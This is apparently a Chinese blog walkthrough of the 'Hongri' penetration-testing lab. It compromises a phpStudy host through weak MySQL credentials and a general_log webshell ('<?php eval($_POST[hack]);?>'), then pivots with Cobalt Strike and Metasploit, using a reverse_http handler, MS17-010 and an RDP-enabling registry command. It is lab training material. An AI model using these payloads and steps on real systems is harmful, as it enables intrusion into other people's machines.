红日靶场一

目录

靶场搭建

1.新建一个仅主机模式的网络,VMnet15

2.添加网络适配器

WEB服务器渗透

1.端口扫描

2.登录后台

3.一句话木马

4.上线cs

内网渗透

1.内网主机存活扫描

2.systeminfo发现域

3.查找域控

4.明文密码

5.域控上线cs

6.win2003上线


靶场搭建

1.新建一个仅主机模式的网络,VMnet15

2.添加网络适配器

将windows2003和windows2008和windows7主机都设置为自定义VMnet15

攻击主机kali为net

设置好之后,win7主机开启phpsyudy,配置就完成了

win7 内网网段192.168.152.128

win2003 内网网段192.168.152.129

win2008 内网网段192.168.152.130

WEB服务器渗透

1.端口扫描

nmap -sS -sV -Pn 192.168.152.128

发现开放80端口证明存在http网站

开放了3306端口,存在mysql数据库,可能存在弱口令

访问网页,发现为phpstudy探针,说明网站是phpstudy搭建的

发现mysql存在root,root弱口令

2.登录后台

网站是由phpstudy搭建的就可能存在phpmyadmin后台

弱口令root,root,成功登录到后台

3.一句话木马

查看数据库是否有导入权限,看能否直接导入木马

SHOW GLOBAL VARIABLES LIKE '%secure%'

没有导入权限

查看是否有开启日志记录

SHOW GLOBAL VARIABLES LIKE '%general%'

日志记录功能关闭,但是可以开启

SET GLOBAL general_log = ON

SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'

插入木马

select '<?php eval ($_POST[hack]);?>'

用蚁剑连接

4.上线cs

使用cs生成一个木马,通过蚁剑上传并执行

上线成功后,首先执行sleep 0

内网渗透

1.内网主机存活扫描

2.systeminfo发现域

3.查找域控

shell net time /domain

4.明文密码

5.域控上线cs

生成一个正向监听

上线成功

6.win2003上线

cs设置5555端口监听

开启msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.164.134
set lport 5555
run

设置路由

run post/multi/manage/autoroute
run autoroute -p
bg

search ms 17_010
use 2
set rhosts 192.168.152.129
//开启3389
'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t 00000000 /f'
run

设置代理

设置小红帽

开启远程桌面

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值